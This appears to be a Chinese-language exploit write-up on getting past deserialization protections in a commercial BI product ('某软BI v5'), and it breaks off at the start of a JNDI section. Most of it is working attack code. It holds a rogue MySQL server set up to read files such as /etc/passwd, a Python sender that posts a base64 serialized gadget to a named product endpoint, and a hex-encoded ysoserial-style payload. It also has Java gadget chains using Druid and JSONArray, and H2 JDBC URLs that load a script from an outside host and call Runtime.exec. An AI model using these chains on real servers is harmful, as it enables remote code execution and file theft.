def addYsoPaylod(username, yso_type, command):
yso_dict[username] = get_yso_content(yso_type, command)


logging.basicConfig(level=logging.INFO)

fileOutputDir = "./fileOutput/"
displayFileContentOnScreen = True
saveToFile = True
fileread_dict = {

}
ysoserialPath = 'ysoserial-0.0.6-SNAPSHOT-all.jar'
javaBinPath = 'java'
defaultFiles = []
if __name__ == "__main__":
import json

with open("config.json") as f:
data = json.load(f)

if 'config' in data:
config_data = data['config']
if 'ysoserialPath' in config_data:
ysoserialPath = config_data['ysoserialPath']
if 'javaBinPath' in config_data:
javaBinPath = config_data['javaBinPath']
if 'fileOutputDir' in config_data:
fileOutputDir = config_data['fileOutputDir']
if 'displayFileContentOnScreen' in config_data:
displayFileContentOnScreen = config_data['displayFileContentOnScreen']
if 'saveToFile' in config_data:
saveToFile = config_data['saveToFile']
import os

try:
os.makedirs(fileOutputDir)
except FileExistsError as _:
pass
for k, v in data['fileread'].items():
if k == '__defaultFiles':
defaultFiles = v
for i in range(len(defaultFiles)):
defaultFiles[i] = defaultFiles[i].encode('ascii')
else:
fileread_dict[k.encode('ascii')] = v.encode('ascii')

# print(fileread_dict)
if "yso" in data:
for k, v in data['yso'].items():
addYsoPaylod(k.encode('ascii'), v[0], v[1])
# print(yso_dict)
loop = asyncio.get_event_loop()
f = start_mysql_server(handle_server, host=None, port=3306)
print("===========================================")
print("MySQL Fake Server")
print("Author:fnmsd(https://blog.csdn.net/fnmsd)")
print("Load %d Fileread usernames :%s" % (len(fileread_dict), list(fileread_dict.keys())))
print("Load %d yso usernames :%s" % (len(yso_dict), list(yso_dict.keys())))
print("Load %d Default Files :%s" % (len(defaultFiles), defaultFiles))
print("Start Server at port 3306")
loop.run_until_complete(f)
loop.run_forever()

并将config.json中的__defaultFiles改为想要读取的文件,

{
"config":{
"ysoserialPath":"D:\nettools\ysoserial\ysoserial-all.jar",
"javaBinPath":"java",
"fileOutputDir":"./fileOutput/",
"displayFileContentOnScreen":true,
"saveToFile":true
},
"fileread":{
"win_ini":"c:\windows\win.ini",
"win_hosts":"c:\windows\system32\drivers\etc\hosts",
"win":"c:\windows\",
"linux_passwd":"/etc/passwd",
"linux_hosts":"/etc/hosts",
"index_php":"index.php",
"ssrf":"https://www.baidu.com/",
"__defaultFiles":["D:/1.txt"]
},
"yso":{
"Jdk7u21":["Jdk7u21",""]
}
}

将生成的base64序列化数据放入python脚本中运行,

# -*-coding:UTF-8 -*-
import base64

import requests

burp0_url = "http://127.0.0.1:37799/webroot/decision/remote/design/channel"

burp0_headers = {
'Host':'127.0.0.1:37799',
'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:120.0)Gecko/20100101Firefox/120.0',
'Accept':'application/json,text/javascript,*/*;q=0.01',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip,deflate',
'content-type':'application/json',
'x-requested-with':'XMLHttpRequest',
'Connection':'close',
'X-For-Forwarded': '127.0.0.1',
'Referer':'http://127.0.0.1:37799/webroot/decision',
}

b = b"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"


burp0_data = base64.b64decode(b)

res = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)

print(res.content.decode("gbk", errors="ignore"))

任意文件读取成功,D:/1.txt内容为1111,

某软BI v5反序列化绕过

之后进行mysql反序列化时,将jdbc改为:jdbc:mysql://127.0.0.1:3306/mysql?characterEncoding=utf8&useSSL=false&characterEncoding=utf8&useSSL=false&maxAllowedPacket=655360&allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_1_1,
然后重新生成base64加密的序列化数据,然后用python发包,不过不能成功,因为mysql组件版本为1.5.49,已经修复了反序列化,

某软BI v5反序列化绕过

使用其他的脚本来搭建mysql服务端,

# coding=utf-8
import socket
import binascii
import os

greeting_data="4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400"
response_ok_data="0700000200000002000000"

def receive_data(conn):
data = conn.recv(1024)
print("[*] Receiveing the package : {}".format(data))
return str(data).lower()

def send_data(conn,data):
print("[*] Sending the package : {}".format(data))
conn.send(binascii.a2b_hex(data))

def get_payload_content():
#file文件的内容使用ysoserial生成的 使用规则:java -jar ysoserial [Gadget] [command] > payload
file= r'payload'
if os.path.isfile(file):
with open(file, 'rb') as f:
payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8')
print("open successs")

else:
print("open false")
#calc
payload_content='aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372002a6a6176612e6c616e672e537472696e672443617365496e73656e736974697665436f6d70617261746f7277035c7d5c50e5ce02000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e00200007870000005e8cafebabe0000003300340a000800240a002500260800270a002500280700290a0005002a07002b07002c0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100124c6f72672f6578616d706c652f43616c633b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e7307002d0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e010001650100154c6a6176612f696f2f494f457863657074696f6e3b01000d537461636b4d61705461626c6507002901000a536f7572636546696c6501000943616c632e6a6176610c0009000a07002e0c002f003001000463616c630c003100320100136a6176612f696f2f494f457863657074696f6e0c0033000a0100106f72672f6578616d706c652f43616c63010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c6574010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b01000f7072696e74537461636b547261636500210007000800000000000400010009000a0001000b0000002f00010001000000052ab70001b100000002000c0000000600010000000b000d0000000c000100000005000e000f00000001001000110002000b0000003f0000000300000001b100000002000c00000006000100000016000d00000020000300000001000e000f00000000000100120013000100000001001400150002001600000004000100170001001000180002000b000000490000000400000001b100000002000c00000006000100000019000d0000002a000400000001000e000f000000000001001200130001000000010019001a000200000001001b001c0003001600000004000100170008001d000a0001000b000000610002000100000012b800021203b6000457a700084b2ab60006b1000100000009000c00050003000c0000001600050000000e00090011000c000f000d001000110012000d0000000c0001000d0004001e001f000000200000000700024c0700210400010022000000020023707400126e616d653535303639313835333834373030707701007871007e000d78'
return payload_content

# 主要逻辑
def run():

while 1:
conn, addr = sk.accept()
print("Connection come from {}:{}".format(addr[0],addr[1]))

# 1.先发送第一个 问候报文
send_data(conn,greeting_data)

while True:
# 登录认证过程模拟 1.客户端发送request login报文 2.服务端响应response_ok
receive_data(conn)
send_data(conn,response_ok_data)

#其他过程
data=receive_data(conn)
#查询一些配置信息,其中会发送自己的 版本号
if "session.auto_increment_increment" in data:
_payload='01000001132e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c210012000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c210033000000fd00001f000022000008036465660000000c696e69745f636f6e6e656374000c210000000000fd00001f0000290000090364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000a03646566000000076c6963656e7365000c210009000000fd00001f00002c00000b03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000c03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000d03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000e036465660000001071756572795f63616368655f73697a65000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000010036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000011036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000012036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001303646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000014036465660000000c776169745f74696d656f7574000c3f001500000008a000000000020100150131047574663804757466380475746638066c6174696e31116c6174696e315f737765646973685f6369000532383830300347504c013107343139343330340236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce4062b30383a30300f52455045415441424c452d5245414405323838303007000016fe000002000000'
send_data(conn,_payload)
data=receive_data(conn)
elif "show warnings" in data:
_payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000'
send_data(conn, _payload)
data = receive_data(conn)
if "set names" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "set character_set_results" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "show session status" in data:
mysql_data = '0100000102'
mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000'
mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000'
# 为什么我加了EOF Packet 就无法正常运行呢??
# 获取payload
payload_content=get_payload_content()
# 计算payload长度
payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4)
payload_length_hex = payload_length[2:4] + payload_length[0:2]
# 计算数据包长度
data_len = str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6)
data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2]
mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex
mysql_data += str(payload_content)
mysql_data += '07000005fe000022000100'
send_data(conn, mysql_data)
data = receive_data(conn)
if "show warnings" in data:
payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000'
send_data(conn, payload)
break


if __name__ == '__main__':
HOST ='0.0.0.0'
PORT = 3306

sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#当socket关闭后,本地端用于该socket的端口号立刻就可以被重用.为了实验的时候不用等待很长时间
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sk.bind((HOST, PORT))
sk.listen(1)

print("start fake mysql server listening on {}:{}".format(HOST,PORT))

run()

mysql组件反序列化依然不成功,说明的确是版本问题,,,

某软BI v5反序列化绕过

jdbc-h2(h2 rce利用失败,h2 1.4.192无rce漏洞)

参考h2的jdbc利用:
https://m0d9.me/2021/04/26/Jdbc%E7%A2%8E%E7%A2%8E%E5%BF%B5%E4%B8%89%EF%BC%9A%E5%86%85%E5%AD%98%E6%95%B0%E6%8D%AE%E5%BA%93/

package org.example;
import com.fr.json.revise.EncodeException;
import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fasterxml.jackson.databind.node.POJONode;
import com.fr.third.fasterxml.jackson.databind.ObjectMapper;
import com.fr.third.fasterxml.jackson.databind.SerializationFeature;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xpath.internal.objects.XString;
import javassist.*;
import org.apache.commons.collections4.FunctorException;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import javax.swing.UIDefaults;

import javax.management.BadAttributeValueExpException;
import com.fr.json.JSONArray;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.util.*;

public class Main {

public static void main(String[] args) throws NotSerializableException, EncodeException, IllegalAccessException, NoSuchFieldException, NotFoundException, CannotCompileException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {

//Test test = new Test();
//User user = new User(test, "qqq");
DruidXADataSource druidXADataSource = new DruidXADataSource();

List<?> list_3 = new ArrayList<>(Arrays.asList(druidXADataSource));
//JSONArray jsonArray_3 = new JSONArray(druidXADataSource);

//new ObjectMapper().disable(SerializationFeature.FAIL_ON_EMPTY_BEANS);

List<?> list_1 = new ArrayList<>(Arrays.asList(list_3));
List<?> list_2 = new ArrayList<>(Arrays.asList("1"));
JSONArray jsonArray_1 = new JSONArray(list_1);
JSONArray jsonArray_2 = new JSONArray(list_2);

UIDefaults uiDefaults = new UIDefaults();
Class clazz = Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap");
Constructor<?> t_constructor = clazz.getDeclaredConstructor();
t_constructor.setAccessible(true);
Object textAndMnemonicHashMap_1 = t_constructor.newInstance();
Object textAndMnemonicHashMap_2 = t_constructor.newInstance();
Method putmethod = clazz.getSuperclass().getDeclaredMethod("put", Object.class, Object.class);
putmethod.setAccessible(true);
putmethod.invoke(textAndMnemonicHashMap_1, jsonArray_1, 11);
putmethod.invoke(textAndMnemonicHashMap_2, jsonArray_2, jsonArray_2);

//HashSet set = new LinkedHashSet();
//set.add(jsonArray_1);
//set.add(jsonArray_2);

//使用一个无害的InvokerTransformer
//InvokerTransformer transformer_1 = new InvokerTransformer("toString", null, null);
//TransformingComparator transformingComparator_1 = new TransformingComparator(transformer_1);

//TreeMap treeMap_1 = new TreeMap<>(transformingComparator_1);
//treeMap_1.put(textAndMnemonicHashMap_1, jsonArray_1);

//TreeMap treeMap_2 = new TreeMap<>(transformingComparator_1);
//treeMap_2.put(textAndMnemonicHashMap_1, jsonArray_2);

Field statLogger = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("statLogger");
statLogger.setAccessible(true);
statLogger.set(druidXADataSource, null);
Field transactionHistogram = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("transactionHistogram");
transactionHistogram.setAccessible(true);
transactionHistogram.set(druidXADataSource, null);
Field logWriter = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("logWriter");
logWriter.setAccessible(true);
logWriter.set(druidXADataSource, null);
Field initedLatch = DruidXADataSource.class.getSuperclass().getDeclaredField("initedLatch");
initedLatch.setAccessible(true);
initedLatch.set(druidXADataSource, null);
Field initialSize = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("initialSize");
initialSize.setAccessible(true);
initialSize.set(druidXADataSource, 1);


//Field driverClass = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("driverClass");
//driverClass.setAccessible(true);
//driverClass.set(druidXADataSource, "javax.naming.InitialContext");

Field xaconnection = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("jdbcUrl");
xaconnection.setAccessible(true);
//nc.exe -lvvp 6666 查看System.getProperty方法调取对应的value
//xaconnection.set(druidXADataSource, "jdbc:hsqldb:http://127.0.0.1:6666/?${user.dir}");
xaconnection.set(druidXADataSource, "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8888/sql.sql'");



Hashtable<Object,Object> hashtable = new Hashtable<>();
hashtable.put(textAndMnemonicHashMap_1,1);
hashtable.put(textAndMnemonicHashMap_2,1);

putmethod.invoke(textAndMnemonicHashMap_1, jsonArray_1, jsonArray_1);


//List<String> list_3 = new ArrayList<>(Arrays.asList("aaa"));
//Field list = JSONArray.class.getDeclaredField("list");
//list.setAccessible(true);
//list.set(jsonArray_1, list_3);

//List<String> list_3 = new ArrayList<>(Arrays.asList("uuuuuu"));
//jsonArray_2.remove(list_1);
//jsonArray_2.add(list_3);
//list_1.add("uuuu");

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(byteArrayOutputStream);
oos.writeObject(hashtable);

byte[] bytes = byteArrayOutputStream.toByteArray();
// 将输出流转化成字节数组,然后base64加密,通过python解密传入,触发反序列化,
Base64.Encoder encoder = Base64.getEncoder();
String base64 = encoder.encodeToString(bytes);
System.out.println(base64);

ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(byteArrayOutputStream.toByteArray()));
Object o = (Object) ois.readObject();

}
}
搭建1.4.192后发现是版本问题,此版本不能rce,将版本换成1.4.197后能rce
pom.xml
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<version>1.4.192</version>
</dependency>

Main.java:
package org.example;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.util.*;

public class Main {

public static void main(String[] args) throws NotSerializableException, IllegalAccessException, NoSuchFieldException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {

String DRIVER_CLASS = "org.h2.Driver";
String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8888/sql.sql'";

Properties info = null;
try {
Class.forName(DRIVER_CLASS);
DriverManager.getDriver(JDBC_URL).connect(JDBC_URL, info);
}catch (ClassNotFoundException | SQLException e) {
e.printStackTrace();
}

}
}


sql.sql的内容:
CREATE TRIGGER poc2 BEFORE SELECT ON
INFORMATION_SCHEMA.TABLES AS $$//javascript
java.lang.Runtime.getRuntime().exec("calc") $$;


或者直接在JDBC_URL上构造js语句:
String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ONn" +
"INFORMATION_SCHEMA.TABLES AS $$//javascriptn" +
"java.lang.Runtime.getRuntime().exec('cmd /c calc.exe')n" +
"$$n";

jndi 反序列化 rce(成功)

生成base64加密的序列化数据,准备利用python发包,

package org.example;
import com.fr.json.revise.EncodeException;
import com.fr.serialization.JDKSerializer;
import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fasterxml.jackson.databind.node.POJONode;
import com.fr.third.fasterxml.jackson.databind.ObjectMapper;
import com.fr.third.fasterxml.jackson.databind.SerializationFeature;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xpath.internal.objects.XString;
import javassist.*;
import oracle.jdbc.rowset.OracleCachedRowSet;
import org.apache.arrow.vector.util.JsonStringArrayList;
import org.apache.commons.collections4.FunctorException;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import javax.swing.UIDefaults;

import javax.management.BadAttributeValueExpException;
import com.fr.json.JSONArray;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.sql.SQLException;
import java.util.*;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;

public class Main {

public static void main(String[] args) throws NotSerializableException, EncodeException, IllegalAccessException, NoSuchFieldException, NotFoundException, CannotCompileException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, SQLException {

